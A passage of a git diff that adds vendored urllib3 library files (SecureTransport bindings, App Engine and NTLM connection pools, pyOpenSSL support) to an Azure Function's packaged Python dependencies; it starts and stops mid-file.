[CFArrayRef, CFIndex] + CoreFoundation.CFArrayGetValueAtIndex.restype = c_void_p + + CoreFoundation.kCFAllocatorDefault = CFAllocatorRef.in_dll( + CoreFoundation, "kCFAllocatorDefault" + ) + CoreFoundation.kCFTypeArrayCallBacks = c_void_p.in_dll( + CoreFoundation, "kCFTypeArrayCallBacks" + ) + CoreFoundation.kCFTypeDictionaryKeyCallBacks = 
c_void_p.in_dll( + CoreFoundation, "kCFTypeDictionaryKeyCallBacks" + ) + CoreFoundation.kCFTypeDictionaryValueCallBacks = c_void_p.in_dll( + CoreFoundation, "kCFTypeDictionaryValueCallBacks" + ) + + CoreFoundation.CFTypeRef = CFTypeRef + CoreFoundation.CFArrayRef = CFArrayRef + CoreFoundation.CFStringRef = CFStringRef + CoreFoundation.CFDictionaryRef = CFDictionaryRef + +except (AttributeError): + raise ImportError("Error initializing ctypes") + + +class CFConst(object): + """ + A class object that acts as essentially a namespace for CoreFoundation + constants. + """ + + kCFStringEncodingUTF8 = CFStringEncoding(0x08000100) + + +class SecurityConst(object): + """ + A class object that acts as essentially a namespace for Security constants. + """ + + kSSLSessionOptionBreakOnServerAuth = 0 + + kSSLProtocol2 = 1 + kSSLProtocol3 = 2 + kTLSProtocol1 = 4 + kTLSProtocol11 = 7 + kTLSProtocol12 = 8 + # SecureTransport does not support TLS 1.3 even if there's a constant for it + kTLSProtocol13 = 10 + kTLSProtocolMaxSupported = 999 + + kSSLClientSide = 1 + kSSLStreamType = 0 + + kSecFormatPEMSequence = 10 + + kSecTrustResultInvalid = 0 + kSecTrustResultProceed = 1 + # This gap is present on purpose: this was kSecTrustResultConfirm, which + # is deprecated. + kSecTrustResultDeny = 3 + kSecTrustResultUnspecified = 4 + kSecTrustResultRecoverableTrustFailure = 5 + kSecTrustResultFatalTrustFailure = 6 + kSecTrustResultOtherError = 7 + + errSSLProtocol = -9800 + errSSLWouldBlock = -9803 + errSSLClosedGraceful = -9805 + errSSLClosedNoNotify = -9816 + errSSLClosedAbort = -9806 + + errSSLXCertChainInvalid = -9807 + errSSLCrypto = -9809 + errSSLInternal = -9810 + errSSLCertExpired = -9814 + errSSLCertNotYetValid = -9815 + errSSLUnknownRootCert = -9812 + errSSLNoRootCert = -9813 + errSSLHostNameMismatch = -9843 + errSSLPeerHandshakeFail = -9824 + errSSLPeerUserCancelled = -9839 + errSSLWeakPeerEphemeralDHKey = -9850 + errSSLServerAuthCompleted = -9841 + errSSLRecordOverflow = -9847 + + errSecVerifyFailed = -67808 + errSecNoTrustSettings = -25263 + errSecItemNotFound = -25300 + errSecInvalidTrustSettings = -25262 + + # Cipher suites. We only pick the ones our default cipher string allows. 
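+    # The hex values are the standard IANA TLS cipher suite codepoints
+    # (0xC02C is TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384, and so on), so
+    # they can also be cross-checked against the IANA registry.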
+ # Source: https://developer.apple.com/documentation/security/1550981-ssl_cipher_suite_values + TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 = 0xC02C + TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 = 0xC030 + TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 = 0xC02B + TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 = 0xC02F + TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 = 0xCCA9 + TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 = 0xCCA8 + TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 = 0x009F + TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 = 0x009E + TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 = 0xC024 + TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 = 0xC028 + TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA = 0xC00A + TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA = 0xC014 + TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 = 0x006B + TLS_DHE_RSA_WITH_AES_256_CBC_SHA = 0x0039 + TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256 = 0xC023 + TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 = 0xC027 + TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA = 0xC009 + TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA = 0xC013 + TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 = 0x0067 + TLS_DHE_RSA_WITH_AES_128_CBC_SHA = 0x0033 + TLS_RSA_WITH_AES_256_GCM_SHA384 = 0x009D + TLS_RSA_WITH_AES_128_GCM_SHA256 = 0x009C + TLS_RSA_WITH_AES_256_CBC_SHA256 = 0x003D + TLS_RSA_WITH_AES_128_CBC_SHA256 = 0x003C + TLS_RSA_WITH_AES_256_CBC_SHA = 0x0035 + TLS_RSA_WITH_AES_128_CBC_SHA = 0x002F + TLS_AES_128_GCM_SHA256 = 0x1301 + TLS_AES_256_GCM_SHA384 = 0x1302 + TLS_AES_128_CCM_8_SHA256 = 0x1305 + TLS_AES_128_CCM_SHA256 = 0x1304 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/low_level.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/low_level.py new file mode 100644 index 0000000..a725c5f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/low_level.py @@ -0,0 +1,397 @@ +""" +Low-level helpers for the SecureTransport bindings. + +These are Python functions that are not directly related to the high-level APIs +but are necessary to get them to work. They include a whole bunch of low-level +CoreFoundation messing about and memory management. The concerns in this module +are almost entirely about trying to avoid memory leaks and providing +appropriate and useful assistance to the higher-level code. +""" +import base64 +import ctypes +import itertools +import os +import re +import ssl +import struct +import tempfile + +from .bindings import CFConst, CoreFoundation, Security + +# This regular expression is used to grab PEM data out of a PEM bundle. +_PEM_CERTS_RE = re.compile( + b"-----BEGIN CERTIFICATE-----\n(.*?)\n-----END CERTIFICATE-----", re.DOTALL +) + + +def _cf_data_from_bytes(bytestring): + """ + Given a bytestring, create a CFData object from it. This CFData object must + be CFReleased by the caller. + """ + return CoreFoundation.CFDataCreate( + CoreFoundation.kCFAllocatorDefault, bytestring, len(bytestring) + ) + + +def _cf_dictionary_from_tuples(tuples): + """ + Given a list of Python tuples, create an associated CFDictionary. + """ + dictionary_size = len(tuples) + + # We need to get the dictionary keys and values out in the same order. 
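+    # Building two parallel ctypes arrays keeps key i aligned with value i,
+    # which is the layout CFDictionaryCreate expects.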
+ keys = (t[0] for t in tuples) + values = (t[1] for t in tuples) + cf_keys = (CoreFoundation.CFTypeRef * dictionary_size)(*keys) + cf_values = (CoreFoundation.CFTypeRef * dictionary_size)(*values) + + return CoreFoundation.CFDictionaryCreate( + CoreFoundation.kCFAllocatorDefault, + cf_keys, + cf_values, + dictionary_size, + CoreFoundation.kCFTypeDictionaryKeyCallBacks, + CoreFoundation.kCFTypeDictionaryValueCallBacks, + ) + + +def _cfstr(py_bstr): + """ + Given a Python binary data, create a CFString. + The string must be CFReleased by the caller. + """ + c_str = ctypes.c_char_p(py_bstr) + cf_str = CoreFoundation.CFStringCreateWithCString( + CoreFoundation.kCFAllocatorDefault, + c_str, + CFConst.kCFStringEncodingUTF8, + ) + return cf_str + + +def _create_cfstring_array(lst): + """ + Given a list of Python binary data, create an associated CFMutableArray. + The array must be CFReleased by the caller. + + Raises an ssl.SSLError on failure. + """ + cf_arr = None + try: + cf_arr = CoreFoundation.CFArrayCreateMutable( + CoreFoundation.kCFAllocatorDefault, + 0, + ctypes.byref(CoreFoundation.kCFTypeArrayCallBacks), + ) + if not cf_arr: + raise MemoryError("Unable to allocate memory!") + for item in lst: + cf_str = _cfstr(item) + if not cf_str: + raise MemoryError("Unable to allocate memory!") + try: + CoreFoundation.CFArrayAppendValue(cf_arr, cf_str) + finally: + CoreFoundation.CFRelease(cf_str) + except BaseException as e: + if cf_arr: + CoreFoundation.CFRelease(cf_arr) + raise ssl.SSLError("Unable to allocate array: %s" % (e,)) + return cf_arr + + +def _cf_string_to_unicode(value): + """ + Creates a Unicode string from a CFString object. Used entirely for error + reporting. + + Yes, it annoys me quite a lot that this function is this complex. + """ + value_as_void_p = ctypes.cast(value, ctypes.POINTER(ctypes.c_void_p)) + + string = CoreFoundation.CFStringGetCStringPtr( + value_as_void_p, CFConst.kCFStringEncodingUTF8 + ) + if string is None: + buffer = ctypes.create_string_buffer(1024) + result = CoreFoundation.CFStringGetCString( + value_as_void_p, buffer, 1024, CFConst.kCFStringEncodingUTF8 + ) + if not result: + raise OSError("Error copying C string from CFStringRef") + string = buffer.value + if string is not None: + string = string.decode("utf-8") + return string + + +def _assert_no_error(error, exception_class=None): + """ + Checks the return code and throws an exception if there is an error to + report + """ + if error == 0: + return + + cf_error_string = Security.SecCopyErrorMessageString(error, None) + output = _cf_string_to_unicode(cf_error_string) + CoreFoundation.CFRelease(cf_error_string) + + if output is None or output == u"": + output = u"OSStatus %s" % error + + if exception_class is None: + exception_class = ssl.SSLError + + raise exception_class(output) + + +def _cert_array_from_pem(pem_bundle): + """ + Given a bundle of certs in PEM format, turns them into a CFArray of certs + that can be used to validate a cert chain. + """ + # Normalize the PEM bundle's line endings. 
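+    # (_PEM_CERTS_RE above only matches "\n"-separated blocks, so CRLF input
+    # would otherwise match nothing and trip the error below.)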
+ pem_bundle = pem_bundle.replace(b"\r\n", b"\n") + + der_certs = [ + base64.b64decode(match.group(1)) for match in _PEM_CERTS_RE.finditer(pem_bundle) + ] + if not der_certs: + raise ssl.SSLError("No root certificates specified") + + cert_array = CoreFoundation.CFArrayCreateMutable( + CoreFoundation.kCFAllocatorDefault, + 0, + ctypes.byref(CoreFoundation.kCFTypeArrayCallBacks), + ) + if not cert_array: + raise ssl.SSLError("Unable to allocate memory!") + + try: + for der_bytes in der_certs: + certdata = _cf_data_from_bytes(der_bytes) + if not certdata: + raise ssl.SSLError("Unable to allocate memory!") + cert = Security.SecCertificateCreateWithData( + CoreFoundation.kCFAllocatorDefault, certdata + ) + CoreFoundation.CFRelease(certdata) + if not cert: + raise ssl.SSLError("Unable to build cert object!") + + CoreFoundation.CFArrayAppendValue(cert_array, cert) + CoreFoundation.CFRelease(cert) + except Exception: + # We need to free the array before the exception bubbles further. + # We only want to do that if an error occurs: otherwise, the caller + # should free. + CoreFoundation.CFRelease(cert_array) + raise + + return cert_array + + +def _is_cert(item): + """ + Returns True if a given CFTypeRef is a certificate. + """ + expected = Security.SecCertificateGetTypeID() + return CoreFoundation.CFGetTypeID(item) == expected + + +def _is_identity(item): + """ + Returns True if a given CFTypeRef is an identity. + """ + expected = Security.SecIdentityGetTypeID() + return CoreFoundation.CFGetTypeID(item) == expected + + +def _temporary_keychain(): + """ + This function creates a temporary Mac keychain that we can use to work with + credentials. This keychain uses a one-time password and a temporary file to + store the data. We expect to have one keychain per socket. The returned + SecKeychainRef must be freed by the caller, including calling + SecKeychainDelete. + + Returns a tuple of the SecKeychainRef and the path to the temporary + directory that contains it. + """ + # Unfortunately, SecKeychainCreate requires a path to a keychain. This + # means we cannot use mkstemp to use a generic temporary file. Instead, + # we're going to create a temporary directory and a filename to use there. + # This filename will be 8 random bytes expanded into base64. We also need + # some random bytes to password-protect the keychain we're creating, so we + # ask for 40 random bytes. + random_bytes = os.urandom(40) + filename = base64.b16encode(random_bytes[:8]).decode("utf-8") + password = base64.b16encode(random_bytes[8:]) # Must be valid UTF-8 + tempdirectory = tempfile.mkdtemp() + + keychain_path = os.path.join(tempdirectory, filename).encode("utf-8") + + # We now want to create the keychain itself. + keychain = Security.SecKeychainRef() + status = Security.SecKeychainCreate( + keychain_path, len(password), password, False, None, ctypes.byref(keychain) + ) + _assert_no_error(status) + + # Having created the keychain, we want to pass it off to the caller. + return keychain, tempdirectory + + +def _load_items_from_file(keychain, path): + """ + Given a single file, loads all the trust objects from it into arrays and + the keychain. + Returns a tuple of lists: the first list is a list of identities, the + second a list of certs. 
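+
+    For example, importing a (hypothetical) PEM bundle holding two
+    certificates and no private key would return ``([], [cert1, cert2])``.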
+ """ + certificates = [] + identities = [] + result_array = None + + with open(path, "rb") as f: + raw_filedata = f.read() + + try: + filedata = CoreFoundation.CFDataCreate( + CoreFoundation.kCFAllocatorDefault, raw_filedata, len(raw_filedata) + ) + result_array = CoreFoundation.CFArrayRef() + result = Security.SecItemImport( + filedata, # cert data + None, # Filename, leaving it out for now + None, # What the type of the file is, we don't care + None, # what's in the file, we don't care + 0, # import flags + None, # key params, can include passphrase in the future + keychain, # The keychain to insert into + ctypes.byref(result_array), # Results + ) + _assert_no_error(result) + + # A CFArray is not very useful to us as an intermediary + # representation, so we are going to extract the objects we want + # and then free the array. We don't need to keep hold of keys: the + # keychain already has them! + result_count = CoreFoundation.CFArrayGetCount(result_array) + for index in range(result_count): + item = CoreFoundation.CFArrayGetValueAtIndex(result_array, index) + item = ctypes.cast(item, CoreFoundation.CFTypeRef) + + if _is_cert(item): + CoreFoundation.CFRetain(item) + certificates.append(item) + elif _is_identity(item): + CoreFoundation.CFRetain(item) + identities.append(item) + finally: + if result_array: + CoreFoundation.CFRelease(result_array) + + CoreFoundation.CFRelease(filedata) + + return (identities, certificates) + + +def _load_client_cert_chain(keychain, *paths): + """ + Load certificates and maybe keys from a number of files. Has the end goal + of returning a CFArray containing one SecIdentityRef, and then zero or more + SecCertificateRef objects, suitable for use as a client certificate trust + chain. + """ + # Ok, the strategy. + # + # This relies on knowing that macOS will not give you a SecIdentityRef + # unless you have imported a key into a keychain. This is a somewhat + # artificial limitation of macOS (for example, it doesn't necessarily + # affect iOS), but there is nothing inside Security.framework that lets you + # get a SecIdentityRef without having a key in a keychain. + # + # So the policy here is we take all the files and iterate them in order. + # Each one will use SecItemImport to have one or more objects loaded from + # it. We will also point at a keychain that macOS can use to work with the + # private key. + # + # Once we have all the objects, we'll check what we actually have. If we + # already have a SecIdentityRef in hand, fab: we'll use that. Otherwise, + # we'll take the first certificate (which we assume to be our leaf) and + # ask the keychain to give us a SecIdentityRef with that cert's associated + # key. + # + # We'll then return a CFArray containing the trust chain: one + # SecIdentityRef and then zero-or-more SecCertificateRef objects. The + # responsibility for freeing this CFArray will be with the caller. This + # CFArray must remain alive for the entire connection, so in practice it + # will be stored with a single SSLSocket, along with the reference to the + # keychain. + certificates = [] + identities = [] + + # Filter out bad paths. + paths = (path for path in paths if path) + + try: + for file_path in paths: + new_identities, new_certs = _load_items_from_file(keychain, file_path) + identities.extend(new_identities) + certificates.extend(new_certs) + + # Ok, we have everything. The question is: do we have an identity? If + # not, we want to grab one from the first cert we have. 
+ if not identities: + new_identity = Security.SecIdentityRef() + status = Security.SecIdentityCreateWithCertificate( + keychain, certificates[0], ctypes.byref(new_identity) + ) + _assert_no_error(status) + identities.append(new_identity) + + # We now want to release the original certificate, as we no longer + # need it. + CoreFoundation.CFRelease(certificates.pop(0)) + + # We now need to build a new CFArray that holds the trust chain. + trust_chain = CoreFoundation.CFArrayCreateMutable( + CoreFoundation.kCFAllocatorDefault, + 0, + ctypes.byref(CoreFoundation.kCFTypeArrayCallBacks), + ) + for item in itertools.chain(identities, certificates): + # ArrayAppendValue does a CFRetain on the item. That's fine, + # because the finally block will release our other refs to them. + CoreFoundation.CFArrayAppendValue(trust_chain, item) + + return trust_chain + finally: + for obj in itertools.chain(identities, certificates): + CoreFoundation.CFRelease(obj) + + +TLS_PROTOCOL_VERSIONS = { + "SSLv2": (0, 2), + "SSLv3": (3, 0), + "TLSv1": (3, 1), + "TLSv1.1": (3, 2), + "TLSv1.2": (3, 3), +} + + +def _build_tls_unknown_ca_alert(version): + """ + Builds a TLS alert record for an unknown CA. + """ + ver_maj, ver_min = TLS_PROTOCOL_VERSIONS[version] + severity_fatal = 0x02 + description_unknown_ca = 0x30 + msg = struct.pack(">BB", severity_fatal, description_unknown_ca) + msg_len = len(msg) + record_type_alert = 0x15 + record = struct.pack(">BBBH", record_type_alert, ver_maj, ver_min, msg_len) + msg + return record diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/appengine.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/appengine.py new file mode 100644 index 0000000..4cfbf7c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/appengine.py @@ -0,0 +1,314 @@ +""" +This module provides a pool manager that uses Google App Engine's +`URLFetch Service `_. + +Example usage:: + + from urllib3 import PoolManager + from urllib3.contrib.appengine import AppEngineManager, is_appengine_sandbox + + if is_appengine_sandbox(): + # AppEngineManager uses AppEngine's URLFetch API behind the scenes + http = AppEngineManager() + else: + # PoolManager uses a socket-level API behind the scenes + http = PoolManager() + + r = http.request('GET', 'https://google.com/') + +There are `limitations `_ to the URLFetch service and it may not be +the best choice for your application. There are three options for using +urllib3 on Google App Engine: + +1. You can use :class:`AppEngineManager` with URLFetch. URLFetch is + cost-effective in many circumstances as long as your usage is within the + limitations. +2. You can use a normal :class:`~urllib3.PoolManager` by enabling sockets. + Sockets also have `limitations and restrictions + `_ and have a lower free quota than URLFetch. + To use sockets, be sure to specify the following in your ``app.yaml``:: + + env_variables: + GAE_USE_SOCKETS_HTTPLIB : 'true' + +3. If you are using `App Engine Flexible +`_, you can use the standard +:class:`PoolManager` without any configuration or special environment variables. 
+""" + +from __future__ import absolute_import + +import io +import logging +import warnings + +from ..exceptions import ( + HTTPError, + HTTPWarning, + MaxRetryError, + ProtocolError, + SSLError, + TimeoutError, +) +from ..packages.six.moves.urllib.parse import urljoin +from ..request import RequestMethods +from ..response import HTTPResponse +from ..util.retry import Retry +from ..util.timeout import Timeout +from . import _appengine_environ + +try: + from google.appengine.api import urlfetch +except ImportError: + urlfetch = None + + +log = logging.getLogger(__name__) + + +class AppEnginePlatformWarning(HTTPWarning): + pass + + +class AppEnginePlatformError(HTTPError): + pass + + +class AppEngineManager(RequestMethods): + """ + Connection manager for Google App Engine sandbox applications. + + This manager uses the URLFetch service directly instead of using the + emulated httplib, and is subject to URLFetch limitations as described in + the App Engine documentation `here + `_. + + Notably it will raise an :class:`AppEnginePlatformError` if: + * URLFetch is not available. + * If you attempt to use this on App Engine Flexible, as full socket + support is available. + * If a request size is more than 10 megabytes. + * If a response size is more than 32 megabytes. + * If you use an unsupported request method such as OPTIONS. + + Beyond those cases, it will raise normal urllib3 errors. + """ + + def __init__( + self, + headers=None, + retries=None, + validate_certificate=True, + urlfetch_retries=True, + ): + if not urlfetch: + raise AppEnginePlatformError( + "URLFetch is not available in this environment." + ) + + warnings.warn( + "urllib3 is using URLFetch on Google App Engine sandbox instead " + "of sockets. To use sockets directly instead of URLFetch see " + "https://urllib3.readthedocs.io/en/1.26.x/reference/urllib3.contrib.html.", + AppEnginePlatformWarning, + ) + + RequestMethods.__init__(self, headers) + self.validate_certificate = validate_certificate + self.urlfetch_retries = urlfetch_retries + + self.retries = retries or Retry.DEFAULT + + def __enter__(self): + return self + + def __exit__(self, exc_type, exc_val, exc_tb): + # Return False to re-raise any potential exceptions + return False + + def urlopen( + self, + method, + url, + body=None, + headers=None, + retries=None, + redirect=True, + timeout=Timeout.DEFAULT_TIMEOUT, + **response_kw + ): + + retries = self._get_retries(retries, redirect) + + try: + follow_redirects = redirect and retries.redirect != 0 and retries.total + response = urlfetch.fetch( + url, + payload=body, + method=method, + headers=headers or {}, + allow_truncated=False, + follow_redirects=self.urlfetch_retries and follow_redirects, + deadline=self._get_absolute_timeout(timeout), + validate_certificate=self.validate_certificate, + ) + except urlfetch.DeadlineExceededError as e: + raise TimeoutError(self, e) + + except urlfetch.InvalidURLError as e: + if "too large" in str(e): + raise AppEnginePlatformError( + "URLFetch request too large, URLFetch only " + "supports requests up to 10mb in size.", + e, + ) + raise ProtocolError(e) + + except urlfetch.DownloadError as e: + if "Too many redirects" in str(e): + raise MaxRetryError(self, url, reason=e) + raise ProtocolError(e) + + except urlfetch.ResponseTooLargeError as e: + raise AppEnginePlatformError( + "URLFetch response too large, URLFetch only supports" + "responses up to 32mb in size.", + e, + ) + + except urlfetch.SSLCertificateError as e: + raise SSLError(e) + + except urlfetch.InvalidMethodError as e: 
+ raise AppEnginePlatformError( + "URLFetch does not support method: %s" % method, e + ) + + http_response = self._urlfetch_response_to_http_response( + response, retries=retries, **response_kw + ) + + # Handle redirect? + redirect_location = redirect and http_response.get_redirect_location() + if redirect_location: + # Check for redirect response + if self.urlfetch_retries and retries.raise_on_redirect: + raise MaxRetryError(self, url, "too many redirects") + else: + if http_response.status == 303: + method = "GET" + + try: + retries = retries.increment( + method, url, response=http_response, _pool=self + ) + except MaxRetryError: + if retries.raise_on_redirect: + raise MaxRetryError(self, url, "too many redirects") + return http_response + + retries.sleep_for_retry(http_response) + log.debug("Redirecting %s -> %s", url, redirect_location) + redirect_url = urljoin(url, redirect_location) + return self.urlopen( + method, + redirect_url, + body, + headers, + retries=retries, + redirect=redirect, + timeout=timeout, + **response_kw + ) + + # Check if we should retry the HTTP response. + has_retry_after = bool(http_response.getheader("Retry-After")) + if retries.is_retry(method, http_response.status, has_retry_after): + retries = retries.increment(method, url, response=http_response, _pool=self) + log.debug("Retry: %s", url) + retries.sleep(http_response) + return self.urlopen( + method, + url, + body=body, + headers=headers, + retries=retries, + redirect=redirect, + timeout=timeout, + **response_kw + ) + + return http_response + + def _urlfetch_response_to_http_response(self, urlfetch_resp, **response_kw): + + if is_prod_appengine(): + # Production GAE handles deflate encoding automatically, but does + # not remove the encoding header. + content_encoding = urlfetch_resp.headers.get("content-encoding") + + if content_encoding == "deflate": + del urlfetch_resp.headers["content-encoding"] + + transfer_encoding = urlfetch_resp.headers.get("transfer-encoding") + # We have a full response's content, + # so let's make sure we don't report ourselves as chunked data. + if transfer_encoding == "chunked": + encodings = transfer_encoding.split(",") + encodings.remove("chunked") + urlfetch_resp.headers["transfer-encoding"] = ",".join(encodings) + + original_response = HTTPResponse( + # In order for decoding to work, we must present the content as + # a file-like object. + body=io.BytesIO(urlfetch_resp.content), + msg=urlfetch_resp.header_msg, + headers=urlfetch_resp.headers, + status=urlfetch_resp.status_code, + **response_kw + ) + + return HTTPResponse( + body=io.BytesIO(urlfetch_resp.content), + headers=urlfetch_resp.headers, + status=urlfetch_resp.status_code, + original_response=original_response, + **response_kw + ) + + def _get_absolute_timeout(self, timeout): + if timeout is Timeout.DEFAULT_TIMEOUT: + return None # Defer to URLFetch's default. 
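+        # A urllib3 Timeout can carry separate connect/read values, while
+        # URLFetch's deadline is a single number; hence the warning below.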
+ if isinstance(timeout, Timeout): + if timeout._read is not None or timeout._connect is not None: + warnings.warn( + "URLFetch does not support granular timeout settings, " + "reverting to total or default URLFetch timeout.", + AppEnginePlatformWarning, + ) + return timeout.total + return timeout + + def _get_retries(self, retries, redirect): + if not isinstance(retries, Retry): + retries = Retry.from_int(retries, redirect=redirect, default=self.retries) + + if retries.connect or retries.read or retries.redirect: + warnings.warn( + "URLFetch only supports total retries and does not " + "recognize connect, read, or redirect retry parameters.", + AppEnginePlatformWarning, + ) + + return retries + + +# Alias methods from _appengine_environ to maintain public API interface. + +is_appengine = _appengine_environ.is_appengine +is_appengine_sandbox = _appengine_environ.is_appengine_sandbox +is_local_appengine = _appengine_environ.is_local_appengine +is_prod_appengine = _appengine_environ.is_prod_appengine +is_prod_appengine_mvms = _appengine_environ.is_prod_appengine_mvms diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/ntlmpool.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/ntlmpool.py new file mode 100644 index 0000000..97435c8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/ntlmpool.py @@ -0,0 +1,130 @@ +""" +NTLM authenticating pool, contributed by erikcederstran + +Issue #10, see: http://code.google.com/p/urllib3/issues/detail?id=10 +""" +from __future__ import absolute_import + +import warnings +from logging import getLogger + +from ntlm import ntlm + +from .. import HTTPSConnectionPool +from ..packages.six.moves.http_client import HTTPSConnection + +warnings.warn( + "The 'urllib3.contrib.ntlmpool' module is deprecated and will be removed " + "in urllib3 v2.0 release, urllib3 is not able to support it properly due " + "to reasons listed in issue: https://github.com/urllib3/urllib3/issues/2282. " + "If you are a user of this module please comment in the mentioned issue.", + DeprecationWarning, +) + +log = getLogger(__name__) + + +class NTLMConnectionPool(HTTPSConnectionPool): + """ + Implements an NTLM authentication version of an urllib3 connection pool + """ + + scheme = "https" + + def __init__(self, user, pw, authurl, *args, **kwargs): + """ + authurl is a random URL on the server that is protected by NTLM. + user is the Windows user, probably in the DOMAIN\\username format. + pw is the password for the user. + """ + super(NTLMConnectionPool, self).__init__(*args, **kwargs) + self.authurl = authurl + self.rawuser = user + user_parts = user.split("\\", 1) + self.domain = user_parts[0].upper() + self.user = user_parts[1] + self.pw = pw + + def _new_conn(self): + # Performs the NTLM handshake that secures the connection. The socket + # must be kept open while requests are performed. + self.num_connections += 1 + log.debug( + "Starting NTLM HTTPS connection no. 
%d: https://%s%s", + self.num_connections, + self.host, + self.authurl, + ) + + headers = {"Connection": "Keep-Alive"} + req_header = "Authorization" + resp_header = "www-authenticate" + + conn = HTTPSConnection(host=self.host, port=self.port) + + # Send negotiation message + headers[req_header] = "NTLM %s" % ntlm.create_NTLM_NEGOTIATE_MESSAGE( + self.rawuser + ) + log.debug("Request headers: %s", headers) + conn.request("GET", self.authurl, None, headers) + res = conn.getresponse() + reshdr = dict(res.getheaders()) + log.debug("Response status: %s %s", res.status, res.reason) + log.debug("Response headers: %s", reshdr) + log.debug("Response data: %s [...]", res.read(100)) + + # Remove the reference to the socket, so that it can not be closed by + # the response object (we want to keep the socket open) + res.fp = None + + # Server should respond with a challenge message + auth_header_values = reshdr[resp_header].split(", ") + auth_header_value = None + for s in auth_header_values: + if s[:5] == "NTLM ": + auth_header_value = s[5:] + if auth_header_value is None: + raise Exception( + "Unexpected %s response header: %s" % (resp_header, reshdr[resp_header]) + ) + + # Send authentication message + ServerChallenge, NegotiateFlags = ntlm.parse_NTLM_CHALLENGE_MESSAGE( + auth_header_value + ) + auth_msg = ntlm.create_NTLM_AUTHENTICATE_MESSAGE( + ServerChallenge, self.user, self.domain, self.pw, NegotiateFlags + ) + headers[req_header] = "NTLM %s" % auth_msg + log.debug("Request headers: %s", headers) + conn.request("GET", self.authurl, None, headers) + res = conn.getresponse() + log.debug("Response status: %s %s", res.status, res.reason) + log.debug("Response headers: %s", dict(res.getheaders())) + log.debug("Response data: %s [...]", res.read()[:100]) + if res.status != 200: + if res.status == 401: + raise Exception("Server rejected request: wrong username or password") + raise Exception("Wrong server response: %s %s" % (res.status, res.reason)) + + res.fp = None + log.debug("Connection established") + return conn + + def urlopen( + self, + method, + url, + body=None, + headers=None, + retries=3, + redirect=True, + assert_same_host=True, + ): + if headers is None: + headers = {} + headers["Connection"] = "Keep-Alive" + return super(NTLMConnectionPool, self).urlopen( + method, url, body, headers, retries, redirect, assert_same_host + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/pyopenssl.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/pyopenssl.py new file mode 100644 index 0000000..3e69df4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/pyopenssl.py @@ -0,0 +1,511 @@ +""" +TLS with SNI_-support for Python 2. Follow these instructions if you would +like to verify TLS certificates in Python 2. Note, the default libraries do +*not* do certificate checking; you need to do additional work to validate +certificates yourself. + +This needs the following packages installed: + +* `pyOpenSSL`_ (tested with 16.0.0) +* `cryptography`_ (minimum 1.3.4, from pyopenssl) +* `idna`_ (minimum 2.0, from cryptography) + +However, pyopenssl depends on cryptography, which depends on idna, so while we +use all three directly here we end up having relatively few packages required. + +You can install them with the following command: + +.. 
code-block:: bash + + $ python -m pip install pyopenssl cryptography idna + +To activate certificate checking, call +:func:`~urllib3.contrib.pyopenssl.inject_into_urllib3` from your Python code +before you begin making HTTP requests. This can be done in a ``sitecustomize`` +module, or at any other time before your application begins using ``urllib3``, +like this: + +.. code-block:: python + + try: + import urllib3.contrib.pyopenssl + urllib3.contrib.pyopenssl.inject_into_urllib3() + except ImportError: + pass + +Now you can use :mod:`urllib3` as you normally would, and it will support SNI +when the required modules are installed. + +Activating this module also has the positive side effect of disabling SSL/TLS +compression in Python 2 (see `CRIME attack`_). + +.. _sni: https://en.wikipedia.org/wiki/Server_Name_Indication +.. _crime attack: https://en.wikipedia.org/wiki/CRIME_(security_exploit) +.. _pyopenssl: https://www.pyopenssl.org +.. _cryptography: https://cryptography.io +.. _idna: https://github.com/kjd/idna +""" +from __future__ import absolute_import + +import OpenSSL.SSL +from cryptography import x509 +from cryptography.hazmat.backends.openssl import backend as openssl_backend +from cryptography.hazmat.backends.openssl.x509 import _Certificate + +try: + from cryptography.x509 import UnsupportedExtension +except ImportError: + # UnsupportedExtension is gone in cryptography >= 2.1.0 + class UnsupportedExtension(Exception): + pass + + +from io import BytesIO +from socket import error as SocketError +from socket import timeout + +try: # Platform-specific: Python 2 + from socket import _fileobject +except ImportError: # Platform-specific: Python 3 + _fileobject = None + from ..packages.backports.makefile import backport_makefile + +import logging +import ssl +import sys + +from .. import util +from ..packages import six +from ..util.ssl_ import PROTOCOL_TLS_CLIENT + +__all__ = ["inject_into_urllib3", "extract_from_urllib3"] + +# SNI always works. +HAS_SNI = True + +# Map from urllib3 to PyOpenSSL compatible parameter-values. +_openssl_versions = { + util.PROTOCOL_TLS: OpenSSL.SSL.SSLv23_METHOD, + 